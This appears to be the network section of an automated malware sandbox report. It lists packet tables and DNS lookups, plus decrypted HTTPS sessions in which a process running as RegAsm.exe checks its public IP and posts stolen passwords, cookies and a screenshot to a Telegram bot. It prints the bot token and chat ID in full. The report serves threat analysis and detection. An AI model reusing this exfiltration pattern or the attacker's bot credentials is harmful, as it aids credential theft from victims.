Oct 3, 2024 09:20:24.720659971 CEST	443	49722	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:25.016959906 CEST	443	49722	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:25.017437935 CEST	49722	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:25.017486095 CEST	443	49722	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:25.017579079 CEST	49722	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:25.017604113 CEST	443	49722	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:25.017905951 CEST	49722	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:25.017924070 CEST	443	49722	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:25.362864971 CEST	443	49722	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:25.363217115 CEST	443	49722	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:25.363518953 CEST	49722	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:25.363562107 CEST	443	49722	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:25.363600016 CEST	49722	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:25.363661051 CEST	49722	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:33.805449963 CEST	49723	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:33.805496931 CEST	443	49723	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:33.805577993 CEST	49723	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:33.806404114 CEST	49723	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:33.806416988 CEST	443	49723	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:34.528462887 CEST	443	49723	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:34.532921076 CEST	49723	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:34.532939911 CEST	443	49723	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:34.836832047 CEST	443	49723	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:34.837791920 CEST	49723	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:34.837831974 CEST	443	49723	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:34.838083029 CEST	49723	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:34.838104963 CEST	443	49723	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:34.838439941 CEST	49723	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:34.838453054 CEST	443	49723	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:35.196137905 CEST	443	49723	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:35.196233988 CEST	443	49723	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:35.196434975 CEST	49723	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:35.196904898 CEST	49723	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:35.402735949 CEST	49724	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:35.402791023 CEST	443	49724	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:35.402858019 CEST	49724	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:35.403290987 CEST	49724	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:35.403311014 CEST	443	49724	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:36.029381037 CEST	443	49724	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:36.032325029 CEST	49724	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:36.032346010 CEST	443	49724	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:36.341507912 CEST	443	49724	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:36.341891050 CEST	49724	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:36.341931105 CEST	443	49724	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:36.342097998 CEST	49724	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:36.342120886 CEST	443	49724	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:36.342211008 CEST	49724	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:36.342248917 CEST	443	49724	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:36.696930885 CEST	443	49724	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:36.697088003 CEST	443	49724	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:36.699157000 CEST	49724	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:36.723632097 CEST	49724	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:47.285669088 CEST	49725	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:47.285713911 CEST	443	49725	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:47.286201954 CEST	49725	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:47.286792040 CEST	49725	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:47.286814928 CEST	443	49725	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:47.922957897 CEST	443	49725	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:47.925694942 CEST	49725	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:47.925708055 CEST	443	49725	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:48.243505955 CEST	443	49725	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:48.244146109 CEST	49725	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:48.244187117 CEST	443	49725	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:48.244333982 CEST	49725	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:48.244357109 CEST	443	49725	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:48.244524956 CEST	49725	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:48.244550943 CEST	443	49725	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:48.609436035 CEST	443	49725	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:48.610596895 CEST	49725	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:48.610707045 CEST	443	49725	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:48.610876083 CEST	49725	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:53.447959900 CEST	49726	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:53.448004007 CEST	443	49726	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:53.448482990 CEST	49726	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:53.449073076 CEST	49726	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:53.449091911 CEST	443	49726	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:54.082046986 CEST	443	49726	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:54.082165003 CEST	49726	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:54.084450960 CEST	49726	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:54.084461927 CEST	443	49726	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:54.084742069 CEST	443	49726	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:54.086280107 CEST	49726	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:54.127409935 CEST	443	49726	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:54.388509989 CEST	443	49726	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:54.388972998 CEST	49726	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:54.389029980 CEST	443	49726	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:54.389113903 CEST	49726	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:54.389132977 CEST	443	49726	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:54.389296055 CEST	49726	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:54.389437914 CEST	443	49726	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:54.768430948 CEST	443	49726	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:54.769171000 CEST	443	49726	149.154.167.220	192.168.2.8
Oct 3, 2024 09:20:54.769310951 CEST	49726	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:20:54.769310951 CEST	49726	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:21:14.886157990 CEST	49727	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:21:14.886193037 CEST	443	49727	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:14.886523008 CEST	49727	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:21:14.886918068 CEST	49727	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:21:14.886930943 CEST	443	49727	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:15.490801096 CEST	443	49727	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:15.492875099 CEST	49727	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:21:15.492913008 CEST	443	49727	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:15.788455963 CEST	443	49727	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:15.788827896 CEST	49727	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:21:15.788871050 CEST	443	49727	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:15.788959026 CEST	49727	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:21:15.788980007 CEST	443	49727	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:15.789057970 CEST	49727	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:21:15.789133072 CEST	443	49727	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:16.141607046 CEST	443	49727	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:16.141688108 CEST	443	49727	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:16.141737938 CEST	49727	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:21:16.142396927 CEST	49727	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:21:27.071677923 CEST	49728	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:21:27.071738005 CEST	443	49728	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:27.072303057 CEST	49728	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:21:27.072551012 CEST	49728	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:21:27.072573900 CEST	443	49728	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:27.679344893 CEST	443	49728	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:27.681529999 CEST	49728	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:21:27.681548119 CEST	443	49728	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:27.976181984 CEST	443	49728	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:27.976479053 CEST	49728	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:21:27.976510048 CEST	443	49728	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:27.976597071 CEST	49728	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:21:27.976618052 CEST	443	49728	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:27.976697922 CEST	49728	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:21:27.976731062 CEST	443	49728	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:28.320648909 CEST	443	49728	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:28.320729017 CEST	443	49728	149.154.167.220	192.168.2.8
Oct 3, 2024 09:21:28.320792913 CEST	49728	443	192.168.2.8	149.154.167.220
Oct 3, 2024 09:21:28.321264982 CEST	49728	443	192.168.2.8	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 09:17:22.432714939 CEST	64797	53	192.168.2.8	1.1.1.1
Oct 3, 2024 09:17:22.439599991 CEST	53	64797	1.1.1.1	192.168.2.8
Oct 3, 2024 09:17:24.286989927 CEST	51810	53	192.168.2.8	1.1.1.1
Oct 3, 2024 09:17:24.293823957 CEST	53	51810	1.1.1.1	192.168.2.8
Oct 3, 2024 09:20:24.091308117 CEST	63008	53	192.168.2.8	1.1.1.1
Oct 3, 2024 09:20:24.101052999 CEST	53	63008	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2024 09:17:22.432714939 CEST	192.168.2.8	1.1.1.1	0x2500	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:17:24.286989927 CEST	192.168.2.8	1.1.1.1	0xadbe	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:20:24.091308117 CEST	192.168.2.8	1.1.1.1	0x9b4c	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 3, 2024 09:17:22.439599991 CEST	1.1.1.1	192.168.2.8	0x2500	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:17:22.439599991 CEST	1.1.1.1	192.168.2.8	0x2500	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:17:22.439599991 CEST	1.1.1.1	192.168.2.8	0x2500	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:17:24.293823957 CEST	1.1.1.1	192.168.2.8	0xadbe	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:20:24.101052999 CEST	1.1.1.1	192.168.2.8	0x9b4c	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	104.26.12.205	443	3508	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:17:23 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-10-03 07:17:23 UTC	211	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:17:23 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8ccb26f39d825e64-EWR
2024-10-03 07:17:23 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49705	149.154.167.220	443	3508	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:17:24 UTC	260	OUT	POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dce3703dfdeaed Host: api.telegram.org Content-Length: 969 Expect: 100-continue Connection: Keep-Alive
2024-10-03 07:17:25 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 07:17:25 UTC	969	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 33 37 30 33 64 66 64 65 61 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 32 38 38 38 38 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 33 37 30 33 64 66 64 65 61 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 30 33 2f 32 30 32 34 20 30 35 3a 33 37 3a 32 30 0a 55 73 65 72 Data Ascii: -----------------------------8dce3703dfdeaedContent-Disposition: form-data; name="chat_id"5928888099-----------------------------8dce3703dfdeaedContent-Disposition: form-data; name="caption"New PW Recovered!Time: 10/03/2024 05:37:20User
2024-10-03 07:17:25 UTC	402	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:17:25 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Logged out"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49706	149.154.167.220	443	3508	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:17:26 UTC	237	OUT	POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dce37f98649edf Host: api.telegram.org Content-Length: 4055 Expect: 100-continue
2024-10-03 07:17:26 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 07:17:26 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 33 37 66 39 38 36 34 39 65 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 32 38 38 38 38 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 33 37 66 39 38 36 34 39 65 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 30 33 2f 32 30 32 34 20 30 37 3a 34 37 3a 31 33 0a 55 73 65 72 Data Ascii: -----------------------------8dce37f98649edfContent-Disposition: form-data; name="chat_id"5928888099-----------------------------8dce37f98649edfContent-Disposition: form-data; name="caption"New CO Recovered!Time: 10/03/2024 07:47:13User
2024-10-03 07:17:26 UTC	2981	OUT	Data Raw: 63 3d 5e 3f eb 69 73 bb ad a9 c8 ac df d9 ee 4f 17 6f 7c 8c 8c 13 f4 67 ca 28 8a f1 a1 68 66 19 8a 08 4a 9f 8c 51 80 5b ad 6d 70 7b 1b d2 b5 7a 93 32 2f e8 95 45 45 cf 54 b6 87 15 55 4e 45 42 54 41 59 ab 82 18 cb 52 24 d4 b7 b1 32 c4 6b 8d e4 05 01 a9 9b dc 38 c8 ab 5c 32 72 d6 5b cb 48 51 45 15 a3 08 de 58 2d 2b a2 a4 88 38 4b 58 55 cb 91 9e be 2c 35 52 54 11 b4 dc 0a 41 14 de bc 5a 96 94 2c f1 f4 24 e8 1d 23 f3 4a b6 a0 89 b6 46 e5 00 af 75 5b b6 b6 56 76 92 79 45 66 33 39 60 4b 8c a0 30 c2 bc be 50 eb c6 8e 5e 52 a1 77 ba db eb 71 3d e2 f0 35 ee 77 a4 ef 90 1a da 2d be e6 87 1c be 83 ec 01 e7 41 2b bb da bd 6b 4e af bc 83 ca 2d aa 37 93 44 62 b0 ab 3d 21 7d 1c f1 51 2c 25 8e 39 3d 02 67 d7 d7 fa bb 7c be fe 1f 33 69 0b cd 4c 11 cc 8f cc a2 b6 01 00 00 Data Ascii: c=^?isOo\|g(hfJQ[mp{z2/EETUNEBTAYR$2k8\2r[HQEX-+8KXU,5RTAZ,$#JFu[VvyEf39`K0P^Rwq=5w-A+kN-7Db=!}Q,%9=g\|3iL
2024-10-03 07:17:26 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 33 37 66 39 38 36 34 39 65 64 66 2d 2d 0d 0a Data Ascii: -----------------------------8dce37f98649edf--
2024-10-03 07:17:26 UTC	402	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:17:26 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Logged out"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49715	149.154.167.220	443	3508	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:19:03 UTC	262	OUT	POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcf63dc95ed8bc Host: api.telegram.org Content-Length: 66189 Expect: 100-continue Connection: Keep-Alive
2024-10-03 07:19:04 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 07:19:04 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 36 33 64 63 39 35 65 64 38 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 32 38 38 38 38 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 36 33 64 63 39 35 65 64 38 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 32 37 2f 32 30 32 34 20 30 33 3a 35 34 3a 30 30 0a 55 73 65 72 Data Ascii: -----------------------------8dcf63dc95ed8bcContent-Disposition: form-data; name="chat_id"5928888099-----------------------------8dcf63dc95ed8bcContent-Disposition: form-data; name="caption"New SC Recovered!Time: 10/27/2024 03:54:00User
2024-10-03 07:19:04 UTC	16355	OUT	Data Raw: 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|T
2024-10-03 07:19:04 UTC	16355	OUT	Data Raw: ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62 8a ec c3 50 74 53 4d ee 79 f8 cc 4a c4 49 34 ad 60 a2 8a 2b a8 e3 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 b4 94 00 51 45 14 Data Ascii: +?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS\|\+=(?O??qpbPtSMyJI4`+((JZ((((((QEJ)hZJ(JZJQE0(ZJQEQE
2024-10-03 07:19:04 UTC	16355	OUT	Data Raw: 45 27 e1 52 30 cf d6 93 9a 5a 4a 06 14 86 94 d2 52 18 94 66 8a 43 48 61 45 14 50 02 7e 14 51 49 48 62 fd 69 28 a5 a0 0e 9e 8a 28 ac cf 0c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 ea 35 5d 32 7d 5b 40 b2 b7 b7 78 d5 97 63 92 e4 81 8d 84 76 07 d6 b0 bf e1 0c d4 bf e7 bd af fd f4 df fc 4d 6e 5b 78 86 ca 1b 58 62 64 98 b2 22 a9 c2 8c 64 0c 7a d4 9f f0 92 d8 ff 00 cf 3b 8f fb e4 7f 8d 78 d4 e7 88 a7 1e 58 c5 fd c7 d4 54 fa ad 49 73 4a 6b ef 47 3f ff 00 08 6e a4 3f e5 bd af fd f6 df fc 4d 6d e9 ba 64 fa 57 87 6f a0 b8 78 d9 98 48 e0 a1 24 63 60 1d c0 f4 a9 7f e1 25 b1 ff 00 9e 57 1f f7 ca ff 00 8d 43 77 e2 1b 39 ac e7 85 22 9c 34 91 b2 8c aa e3 24 63 d6 8a 93 c4 54 8f 2c a2 fe e0 a7 f5 5a 72 e6 8c d7 de 8e 6a 8a 28 af 64 f9 80 a4 a5 a2 80 12 Data Ascii: E'R0ZJRfCHaEP~QIHbi(((((((5]2}[@xcvMn[xXbd"dz;xXTIsJkG?n?MmdWoxH$c`%WCw9"4$cT,Zrj(d
2024-10-03 07:19:04 UTC	15447	OUT	Data Raw: 8f 89 22 b4 23 e5 fb 39 90 1f 7c 90 7f a5 68 01 12 5a 91 08 41 18 53 80 98 c7 e9 50 3c 30 7f 69 0b 86 51 e7 08 b6 86 cf 38 c9 e2 b6 95 45 29 39 35 dc e9 e4 b4 52 46 2f 8b 3f d7 5b 7f ba df d2 b9 fa e8 3c 59 fe ba db fd d6 fe 95 cf d7 ad 84 fe 0c 7f ae a7 cd 66 1f ef 32 f9 7e 48 28 a2 8a e9 38 82 b2 e6 99 ad b5 65 9d 3e f4 4e ae 3e a3 06 b5 2a 09 ad a1 90 b3 b2 65 b1 d7 26 a6 5b 3b 9d 38 5a 8a 15 35 ea 68 5f f8 9e de 6d 73 4f bc b6 8a 54 82 d8 b1 65 60 03 1d c7 e6 c0 cf a5 65 78 8b 53 8b 55 d4 fc f8 11 92 14 8d 63 45 60 01 00 7b 0f 72 6b b9 ff 00 84 53 43 ff 00 9f 1f fc 8a ff 00 e3 4a 3c 2b a1 82 08 b1 1c 7a c8 e7 fa d7 9b 1c 45 18 34 d2 7a 1f 47 2a 55 25 a3 68 92 f7 4a 6b 9b a7 98 26 9a 43 63 99 ac bc c7 e9 8e 5b 78 cf e5 52 69 da 6b 59 ce d2 14 b0 19 5d Data Ascii: 